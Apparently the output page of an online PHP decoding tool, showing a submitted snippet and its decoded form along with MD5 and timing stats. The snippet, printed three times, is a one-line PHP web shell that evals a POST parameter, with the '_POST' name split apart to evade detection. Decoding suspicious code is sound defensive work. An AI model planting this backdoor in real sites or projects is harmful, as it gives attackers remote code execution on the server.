Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php //@eval($_POST['op']); @eval(${"_P"."OST"}['op']); ?>..
Decoded Output download
<?php
//@eval($_POST['op']);
@eval(${"_P"."OST"}['op']);
?>
Did this file decode correctly?
Original Code
<?php
//@eval($_POST['op']);
@eval(${"_P"."OST"}['op']);
?>
Function Calls
| None |
Stats
| MD5 | 28c2096f8ee7d274bdde28b8355ae235 |
| Eval Count | 0 |
| Decode Time | 117 ms |